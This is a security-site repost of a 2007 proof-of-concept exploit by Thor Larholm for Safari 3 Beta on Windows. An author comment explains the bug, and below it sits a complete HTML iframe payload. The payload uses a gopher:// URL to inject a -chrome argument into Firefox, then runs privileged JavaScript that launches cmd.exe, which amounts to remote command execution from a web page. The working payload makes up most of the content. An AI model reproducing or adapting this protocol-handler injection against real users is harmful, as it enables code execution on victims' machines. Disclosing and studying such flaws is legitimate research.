首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Safari 3 for Windows Beta Remote Command Execution PoC
来源:http://larholm.com 作者:Thor 发布时间:2007-06-13  
<!--
Safari for Windows, 0day exploit in 2 hours
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
By Thor Larholm

The below PoC exploit will exploit Safari by bouncing through Firefox
via the Gopher protocol, passing on unfiltered input for the -chrome
argument that Firefox exposes. When it has done this it will launch
C:\Windows\System32\cmd.exe with any arguments that have been specified
in the call to the process.run method.

It is important to know that, even though this PoC exploit uses Firefox,
the actual vulnerability is within the lack of input validation for the
command line arguments handed to the various URL protocol handlers on
your machine. As such, there are a lot of different attack vectors for
this vulnerability, I simply chose Firefox and the Gopher URL protocol
because I was familiar with these.

I hope you enjoyed the fruits of my 2 hours of labour. Please feel free
to add my RSS feed to your reader and come back again tomorrow or next
week for a fresh batch of 0day vulnerabilities :)

Cheers Thor Larholm
-->

<html><body>
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[&#39;@mozilla.org/file/local;1&#39;].createInstance(I.nsILocalFile);file.initWithPath(&#39;C:&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;Windows&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;System32&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;cmd.exe&#39;);process=C[&#39;@mozilla.org/process/util;1&#39;].createInstance(I.nsIProcess);process.init(file);process.run(true&#44;{}&#44;0);alert(process)'></iframe>process.init(file);process.run(true,{},0);alert(process)
</body></html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TEC-IT TBarCode OCX ActiveX Re
·Fuzzylime Forum 1.0 (low.php t
·Ace-FTP Client 1.24a Remote Bu
·Microsoft Speech API ActiveX c
·Internet Download Accelerator
·Microsoft Speech API ActiveX c
·PHP Real Estate Classifieds Re
·Microsoft Office MSODataSource
·e-Vision CMS <= 2.02 SQL Injec
·Sitellite CMS <= 4.2.12 (55966
·Yahoo! Messenger Webcam 8.1 (Y
·PHP::HTML 0.6.4 (phphtml.php)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved